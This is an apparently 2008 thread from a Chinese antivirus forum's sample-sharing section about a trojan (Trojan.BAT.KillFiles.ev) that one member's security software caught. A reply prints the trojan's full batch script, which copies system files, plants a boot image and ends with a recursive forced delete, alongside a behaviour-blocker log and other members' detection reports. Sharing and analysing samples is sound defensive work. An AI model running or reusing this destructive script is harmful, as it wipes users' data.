收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 超级巡警抓到的样本
12下一页
返回列表 发新帖
查看: 2918|回复: 12
收起左侧

[病毒样本] 超级巡警抓到的样本

[复制链接]
水晶
头像被屏蔽
发表于 2008-8-19 07:58:34 | 显示全部楼层 |阅读模式
发现病毒:Trojan.BAT.KillFiles.ev  处理结果:清除成功   描述:特洛伊木马  文件路径:"C:\WINDOWS\Temp\yjhy\setup.exe"
回复

举报

kikyo9527
头像被屏蔽
发表于 2008-8-19 08:20:09 | 显示全部楼层
干掉
回复

举报

lg560852
发表于 2008-8-19 08:25:31 | 显示全部楼层
这个有啥行为没?
在线分析就报了一木马,然后创建了2个文件夹,完了
http://www.threatexpert.com/repo ... b4fa248dd9977d85768
倒是,这个病毒的图标很好看

[ 本帖最后由 lg560852 于 2008-8-19 08:28 编辑 ]
回复

举报

syfwxmh
发表于 2008-8-19 08:38:18 | 显示全部楼层
TOKL
回复

举报

忧郁浪子
发表于 2008-8-19 09:16:29 | 显示全部楼层
  1. 2008-08-19 09:13:10    运行应用程序      操作:阻止
  2. 进程路径:F:\virus\setup\setup.exe
  3. 文件路径:C:\WINDOWS\system32\cmd.exe
  4. 命令行:/c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1520093.bat  
  5. 触发规则:所有程序规则->禁止该位置->%windir%\*
复制代码


1520093.bat内容如下:

  1. @Echo Off
  2. Copy /y windows\*.* c:\windows >nul
  3. nt.exe
  4. ;Echo 程序正在运行,请稍等,12秒钟后自动重启电脑...
  5. sleep 12
  6. If Exist c:\boot\ghos. rd /s /q c:\boot\ghos
  7. If Exist c:\GHLDR attrib -r -s -h c:\GHLDR
  8. If Exist c:\GHLDR Del GHLDR
  9. md c:\boot\ghos
  10. Copy PQVF.VFD c:\boot\ghos\dos.img >nul
  11. Copy menu.lst c:\boot\ghos\ >nul
  12. Copy GHLDR c:\ >nul
  13. Copy IMG.exe c:\boot\ghos >nul
  14. Del IMG.exe
  15. Cd\
  16. c:
  17. Cd c:\boot\ghos
  18. Echo cdqd >cdqd.exe
  19. IMG A dos.img cdqd.exe
  20. Del IMG.exe
  21. Del cdqd.exe
  22. Del /f /s /q .
复制代码
回复

举报

fireworld
发表于 2008-8-19 10:39:53 | 显示全部楼层
破坏dos工具箱的?
回复

举报

kkgh
发表于 2008-8-19 10:42:03 | 显示全部楼层
诺顿杀
回复

举报

cruiyong
发表于 2008-8-19 12:34:14 | 显示全部楼层

有这些动作

有这些动作
回复

举报

luxiao200888
发表于 2008-8-19 13:01:48 | 显示全部楼层
TR/Horse.HK Trojan
回复

举报

龙城小武
发表于 2008-8-19 13:08:44 | 显示全部楼层
卡巴2009过了
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-11-10 21:36 , Processed in 0.127909 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表